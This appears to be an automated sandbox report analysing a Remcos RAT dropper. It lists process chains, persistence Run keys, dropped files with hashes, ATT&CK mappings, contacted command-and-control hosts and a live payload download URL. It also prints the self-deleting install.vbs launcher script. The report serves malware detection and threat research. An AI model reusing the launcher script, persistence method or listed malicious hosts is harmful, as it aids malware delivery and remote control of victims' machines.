Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00563B60 mov eax, dword ptr fs:[00000030h]	24_2_00563B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568C44 mov eax, dword ptr fs:[00000030h]	24_2_00568C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565843 mov eax, dword ptr fs:[00000030h]	24_2_00565843
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00567C70 mov eax, dword ptr fs:[00000030h]	24_2_00567C70
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568C6D mov eax, dword ptr fs:[00000030h]	24_2_00568C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056813E mov eax, dword ptr fs:[00000030h]	24_2_0056813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00563774 mov eax, dword ptr fs:[00000030h]	24_2_00563774
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00563B6F mov eax, dword ptr fs:[00000030h]	24_2_00563B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00562F3E mov eax, dword ptr fs:[00000030h]	24_2_00562F3E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior

Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmp	Binary or memory string: Program Manager
Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmp	Binary or memory string: Program Manager Started
Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmp	Binary or memory string: Program Managerer ]
Source: logs.dat.23.dr	Binary or memory string: [ Program Manager ]
Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmp	Binary or memory string: Program Manager&Hmg

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Code function: 0_2_020B9FF7 cpuid

0_2_020B9FF7

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1 VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: win.exe PID: 2796, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: win.exe PID: 2796, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder1	Process Injection12	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion23	LSASS Memory	Security Software Discovery631	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion23	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol112	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery322	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	6%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\win.exe	6%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	true	false		unknown
ztechinternational.com	192.185.113.219	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.185.113.219	ztechinternational.com	United States		46606	UNIFIEDLAYER-AS-1US	true
172.94.125.152	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	United States		9009	M247GB	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	430707
Start date:	07.06.2021
Start time:	20:41:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@19/10@9/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.5% (good quality ratio 0.6%) Quality average: 11.4% Quality standard deviation: 27.1%
HCA Information:	Successful, ratio: 70% Number of executed functions: 167 Number of non-executed functions: 61
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 13.64.90.137, 13.88.21.125, 104.42.151.234, 20.82.210.154, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 23.57.80.111 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/430707/sample/SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Simulations

Behavior and APIs

Time	Type	Description
20:43:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
20:43:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
20:45:08	API Interceptor	775x Sleep call for process: win.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.185.113.219	SecuriteInfo.com.__vbaHresultCheckObj.9138.exe	Get hash	malicious	Browse	ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin
192.185.113.219	MLJ.exe	Get hash	malicious	Browse	ztechinternational.com/dk/Maily%20_remcos_poYYVI175.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	uFLbcEn9qq.xlsx	Get hash	malicious	Browse	172.94.125.184
	b20e3f39_by_Libranalysis.exe	Get hash	malicious	Browse	172.94.125.102
	f4b56009_by_Libranalysis.exe	Get hash	malicious	Browse	46.243.140.90
	49481a54_by_Libranalysis.exe	Get hash	malicious	Browse	46.243.140.90
	INTRZGw3ev.exe	Get hash	malicious	Browse	46.243.140.66
	LMKQB8tQQ2.exe	Get hash	malicious	Browse	10.4.78.10
	SecuriteInfo.com.Generic.mg.80f76c27257e6f3e.exe	Get hash	malicious	Browse	172.94.37.30
ztechinternational.com	SecuriteInfo.com.__vbaHresultCheckObj.9138.exe	Get hash	malicious	Browse	192.185.113.219
ztechinternational.com	MLJ.exe	Get hash	malicious	Browse	192.185.113.219

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
M247GB	MLJ.exe	Get hash	malicious	Browse	46.243.233.25
	CN-Invoice-XXXXX9808-1901114328710090.pdf.exe	Get hash	malicious	Browse	217.138.212.59
	PO-13916.jpeg.exe	Get hash	malicious	Browse	217.138.212.59
	6NcvrNwxSh.exe	Get hash	malicious	Browse	46.243.237.125
	FcMJC6EWgP.exe	Get hash	malicious	Browse	104.250.182.36
	CLAVIS INVESTMENTS.xlsx	Get hash	malicious	Browse	104.250.182.19
	PO1223.exe	Get hash	malicious	Browse	37.120.210.211
	DHL On Demand Delivery.exe	Get hash	malicious	Browse	217.138.212.59
	DHL On Demand Delivery.pdf.exe	Get hash	malicious	Browse	217.138.212.59
	uFLbcEn9qq.xlsx	Get hash	malicious	Browse	172.94.125.184
	payment.PDF.vbs	Get hash	malicious	Browse	46.243.237.31
	b20e3f39_by_Libranalysis.exe	Get hash	malicious	Browse	172.94.125.102
	pKDw1bLc83.exe	Get hash	malicious	Browse	46.243.248.60
	New Items RFQ & Specifications Revised_20210520.exe	Get hash	malicious	Browse	195.206.105.10
	WixdbcV8At.exe	Get hash	malicious	Browse	45.141.152.194
	67e197ce_by_Libranalysis.exe	Get hash	malicious	Browse	188.72.119.8
	f4b56009_by_Libranalysis.exe	Get hash	malicious	Browse	46.243.140.90
	49481a54_by_Libranalysis.exe	Get hash	malicious	Browse	46.243.140.90
	CN-Invoice-XXXXX9808-190111432871000.pdf.exe	Get hash	malicious	Browse	217.138.212.59
	Quotation_05082021 pdf.exe	Get hash	malicious	Browse	95.215.225.23
UNIFIEDLAYER-AS-1US	SecuriteInfo.com.__vbaHresultCheckObj.9138.exe	Get hash	malicious	Browse	192.185.113.219
	MLJ.exe	Get hash	malicious	Browse	192.185.113.219
	LEMOH.exe	Get hash	malicious	Browse	162.241.219.209
	03062021.exe	Get hash	malicious	Browse	162.241.253.69
	Shipment documents.exe	Get hash	malicious	Browse	192.185.190.186
	statistic-608048546.xls	Get hash	malicious	Browse	192.185.225.204
	statistic-608048546.xls	Get hash	malicious	Browse	192.185.225.204
	AHG QUOTE pdf 76530.exe	Get hash	malicious	Browse	192.185.41.225
	Invoice number FV0062022020.exe	Get hash	malicious	Browse	74.220.199.6
	Payment slip.exe	Get hash	malicious	Browse	50.87.170.32
	SOA_Outstanding_Balance.exe	Get hash	malicious	Browse	192.185.129.69
	RFQ K1062 PROJECT.exe	Get hash	malicious	Browse	162.241.27.245
	] New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	192.185.20.31
	oVA5JBAJutcna88.exe	Get hash	malicious	Browse	50.87.253.188
	a8eC6O6okf.exe	Get hash	malicious	Browse	50.87.146.99
	oNUUaugLQjvRcCL.exe	Get hash	malicious	Browse	50.87.151.118
	CAS No. 584-84-9.exe	Get hash	malicious	Browse	162.144.13.239
	CAS No. 9004-65-3.exe	Get hash	malicious	Browse	162.144.13.239
	02357#U260eThomas#Ud83d#Udce0.HTM	Get hash	malicious	Browse	192.185.198.10
	6dTTv9IdCw.exe	Get hash	malicious	Browse	74.220.199.8

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1.~tmp Download File
Process:	C:\Windows\System32\backgroundTaskHost.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9472
Entropy (8bit):	5.648577726443805
Encrypted:	false
SSDEEP:	192:TMXLpAvK70mJtlHB5tHyIyo0HyIz2sEHyI+t:O5BrCaRA
MD5:	85D06071360BFD61E25CB454BC3D9A52
SHA1:	950C8BB32046385EC5924E742A0626F4FE33905C
SHA-256:	FF30FCDBC0BC021882B324869C6F642FEF4C5E2F4F1FF50265869459C4B4A0CE
SHA-512:	996E2DDD56A39119310235F30AF0B0E94F9598D2E1FCE417C90EA1DAA4D2CC61A38F1A38239EB4F9D6B18B0A7B8B94C1C0119A8C950E6D6548548CAFA0A48863
Malicious:	false
Reputation:	low
Preview:	{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":619870,"height":1080,"sha256":"Sjoon1DPT2frxCE4x8+n/eInIBto1+Bqa2+yCIAGsnE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\802718d3cf4e06d977a7ce89b9b5b059961bd30dd185cfc85d50f4b517d86888"},"portraitImage":{"fileSize":541306,"height":1920,"sha256":"5J1QvtZQvTAkpjdIGXZjpmwft0txV5oWHNifdjQq+SA=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\afece1b8b7bbd157a59a74a90e4894314c82accd9b3076dfe8ee636d610fcafb"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1.~tmp Download File
Process:	C:\Windows\System32\backgroundTaskHost.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9626
Entropy (8bit):	5.620324379710843
Encrypted:	false
SSDEEP:	192:8Wo0fhWWozjAvKZph/DtlHB5WHyPWhuBHyerhOt9HyTYr:LfhJ0hVohuhkr
MD5:	B48D9564B458B043EA568C06C3E8DD00
SHA1:	317E35E4D15A036F1A5EB88BDB0467B3142AB1C9
SHA-256:	DEF2CBC831437E6C49048AF0A85E0FBD5E533C040309F92293A2554CADCFD03A
SHA-512:	BBA8D250145080CC6AAE568FB66E5346C7B5E5C366F36E74A039733CF64832294B1DFF9EBAE191375ED00AA3612ECDD2F206F6B105127735D0FA8210DC936460
Malicious:	false
Reputation:	low
Preview:	{"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":556406,"height":1080,"sha256":"CY3KzKVHdoTu7NbePjx+CQPZn53417ZCdtczfhQp7ag=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c6f553ef401df1783242a6b5e23dca6ee2b1ba33f2a7e7f4d621fd5e77abb22b"},"portraitImage":{"fileSize":596086,"height":1920,"sha256":"/oiuOOD/NM0Qccsss/nuHFdUzMCaXUgbKXyyTwXRIpY=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d496c712e078cb44236edd3e8ea0055ee21cb66c3c7ce5ec90fb916e48dea486"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","

C:\Users\user\AppData\Local\Temp\install.vbs Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
File Type:	data
Category:	modified
Size (bytes):	404
Entropy (8bit):	3.476487137149483
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
MD5:	0AC72B36AE19DF5DD84381E07A64BA3B
SHA1:	194801CB7059E67ABF5A38E709D856A8095A71EE
SHA-256:	B17BD1B45A2144EAA120C3EE9BB97622B2A54B0D36A69B3750AF2678D359D14D
SHA-512:	DA76EC5A6C11DE83532AED125DF88B43BABD72774EC8A91C05697E4941F9C8DB2757402787C40EB08DFD82A0927A8A301F84FEE5EDE10D2DB56CC7B0BB429604
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\logs.dat Download File
Process:	C:\Users\user\AppData\Roaming\win.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.733300752387368
Encrypted:	false
SSDEEP:	3:ttUbV26rA4RXMRPHv31aeo:tmbXqdHv3IP
MD5:	4F44B12133FC55DA5016BABB674C756B
SHA1:	64B014DFF9B1A53ED1280E25D39977D007EB75B0
SHA-256:	E758FA16613EDE36575D3BC67FD9BCF8CF17AFF54003D45134CB3F5EBE6E100D
SHA-512:	38E69085470098AD5DCA565C10ADF731DB7854892D6FA4E117384B481345195B9021E2AA42FF98BB1903D84254A530F9CEBADA998D0C6380F2A0F38F617DC15C
Malicious:	false
Reputation:	low
Preview:	..[2021/06/07 20:45:08 Offline Keylogger Started]....[ Program Manager ]..

C:\Users\user\AppData\Roaming\win.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	6.215185448028134
Encrypted:	false
SSDEEP:	3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
MD5:	853744502B68E50E6CBAF81FFB3F5CC0
SHA1:	EA748BAEBE70D7C6D3DA9D1A2A34B76051425962
SHA-256:	8115607710C35C78EDA8DD16D73CAB92E2C857D8C91EB1422FCC1B3F06835A4A
SHA-512:	5B12B465E6F964F7280359546D42676A9A8B2C221568F4D4EE849F0E759E9DB59F5A43BF648E37C3878558142A1EB926331127606F78FC601DD8B69AC4D089F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 6%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@..................................-......................................t...(...........................................................................(... ....................................text...8\|.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Lwo7 Download File
Process:	C:\Users\user\AppData\Roaming\win.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	56
Entropy (8bit):	3.521640636343319
Encrypted:	false
SSDEEP:	3:RRQRRQRRQRRQn:qQQS
MD5:	A0C9E601546791A2A273DEAC8256A3E5
SHA1:	4014E6DD93022436BEB51DFB32BDF995542C3942
SHA-256:	77F928BAFA7CCBF6071DD1DC877C30D5C9E1380F53F31A7283AE769B0C9BE20D
SHA-512:	7F19CBF8F2D17B6632E4CAB562F6936EB791D1738C93A83CC61E4470780B84DCBFDB4D935324474CC0665882A04EA64FABF25DA2405263C7A668FD1B42CFD4F7
Malicious:	false
Preview:	Chittamwood3..Chittamwood3..Chittamwood3..Chittamwood3..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.215185448028134
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
File size:	110592
MD5:	853744502b68e50e6cbaf81ffb3f5cc0
SHA1:	ea748baebe70d7c6d3da9d1a2a34b76051425962
SHA256:	8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
SHA512:	5b12b465e6f964f7280359546d42676a9a8b2c221568f4d4ee849f0e759e9db59f5a43bf648e37c3878558142a1eb926331127606f78fc601dd8b69ac4d089f1
SSDEEP:	3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@................

File Icon


Icon Hash:	2828bae9d2777576

Static PE Info

General
Entrypoint:	0x4015d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5A3E9E30 [Sat Dec 23 18:19:28 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	20511f60b3c62ae145d60c4c066b22a5

Entrypoint Preview

Instruction
push 00401D68h
call 00007F430CA36443h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, dh
into
xchg eax, ebp
xchg dword ptr [esi-7Ah], eax
into
dec esi
lahf
jnbe 00007F430CA36446h
loop 00007F430CA3647Ah
sbb byte ptr [esi+0000005Fh], cl
add byte ptr [eax], al
add byte ptr [ecx], al
